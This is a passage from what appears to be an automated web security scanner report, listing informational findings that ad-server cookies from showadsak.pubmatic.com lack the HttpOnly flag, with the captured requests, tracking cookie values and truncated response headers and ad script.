Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:05:39 GMT
Content-Length: 1310
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:05:39 GMT; path=/
Set-Cookie: pubfreq_27331_22455_1628028529=661-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:45:39 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

12.171. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A34&ranreq=0.13483623624779284&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Right,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fnational%2Fremembering_911%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:08 GMT
Content-Length: 1936
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:08 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1226431966=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:08 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:04:08 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.172. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A3&ranreq=0.39337378134950995&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=67673251&rk1=17154153&rk2=1316239503.607&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:03:38 GMT
Content-Length: 1851
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:03:37 GMT; path=/
Set-Cookie: _curtime=1316221418; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:13:38 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1229426233=243-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:43:38 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwi
...[SNIP]...

12.173. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A34&ranreq=0.23497605347074568&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Right,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fnational%2Fremembering_911%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:08 GMT
Content-Length: 1858
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:08 GMT; path=/
Set-Cookie: pubfreq_27331_22455_1420040876=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:08 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:04:08 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.174. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22454&kadwidth=300&kadheight=250&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A36&ranreq=0.6313232632819563&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414207&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=91119514&rk1=18936363&rk2=1316239536.352&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:10 GMT
Content-Length: 1179
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:10 GMT; path=/
Set-Cookie: pubfreq_27331_22454_319263946=776-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:10 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC2VwAAAAAAAAAA
...[SNIP]...

12.175. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A2&ranreq=0.11398947122506797&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:03:36 GMT
Content-Length: 1858
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:03:36 GMT; path=/
Set-Cookie: pubfreq_27331_22455_693123037=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:43:36 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:03:36 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.176. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A4%3A13&ranreq=0.38578117452561855&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fstar_tracks%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:02:48 GMT
Content-Length: 1868
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:02:48 GMT; path=/
Set-Cookie: pubfreq_27331_23101_1710273189=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:42:48 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:02:48 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.177. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A46&ranreq=0.29180969577282667&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=11415325&rk1=4961111&rk2=1316239725.757&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:20 GMT
Content-Length: 1307
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:07:20 GMT; path=/
Set-Cookie: pubfreq_27331_22455_815454125=661-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:47:20 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

12.178. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23102&kadwidth=300&kadheight=250&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A2&ranreq=0.9849869161844254&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:03:36 GMT
Content-Length: 1939
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:03:36 GMT; path=/
Set-Cookie: pubfreq_27331_23102_1835717243=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:43:36 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:03:36 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.179. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

